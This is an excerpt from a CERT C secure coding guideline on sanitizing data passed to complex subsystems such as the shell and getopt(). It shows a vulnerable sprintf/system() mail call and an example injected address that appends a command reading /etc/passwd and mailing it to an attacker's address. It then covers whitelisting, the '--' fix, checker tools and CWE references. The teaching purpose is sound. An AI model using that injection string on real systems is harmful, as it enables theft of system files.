...
```c
sprintf(buffer, "/bin/mail %s < /tmp/email", addr);
system(buffer);
```
The risk, of course, is that the user enters the following string as an email address, so that the shell started by system() runs a second command after the intended one:
```
bogus@addr.com; cat /etc/passwd | mail some@badguy.net
```
For more information on the system() call, see ENV03-C. Sanitize the environment when invoking external programs and ENV04-C. Do not call system() if you do not need a command processor.
...
It is necessary to ensure that all valid data is accepted while potentially dangerous data is rejected or sanitized. Doing so can be difficult when valid characters or sequences of characters also have special meaning to the subsystem, and it may involve validating the data against a grammar. In cases where there is no such overlap, whitelisting (accepting only characters from a known-good set and rejecting everything else) can be used to keep dangerous characters out of the data; a whitelist is preferable to a blacklist of known-bad characters because the latter fails open whenever a metacharacter of the subsystem is forgotten.
...
The following compliant solution inserts the "--" (double dash) argument before the call to getenv("USER") in the call to execl():
...
Because the login program uses the POSIX getopt() function to parse command-line arguments, and because the "--" (double dash) argument causes getopt() to stop interpreting options in the argument list, the USER variable cannot be used by an attacker to inject an additional command-line option: whatever follows "--" is treated as a positional argument even if it begins with "-". This is a valid means of sanitizing the untrusted user data in this context because the interpretation of the resulting string by the subsystem is rendered innocuous, without having to reject or alter any value of USER.
...
Tool | Version | Checker | Description
---|---|---|---
Coverity | 6.5 | TAINTED_STRING | Fully implemented
Klocwork | 5.0 | NNTS.TAINTED, SV.TAINTED.INJECTION |
...
Standard | Related guideline
---|---
CERT C++ Secure Coding Standard | STR02-CPP. Sanitize data passed to complex subsystems
CERT Oracle Secure Coding Standard for Java | IDS00-J. Sanitize untrusted data passed across a trust boundary
MITRE CWE | CWE-88, Argument injection or modification; CWE-78, Failure to sanitize data into an OS command (aka "OS command injection")
...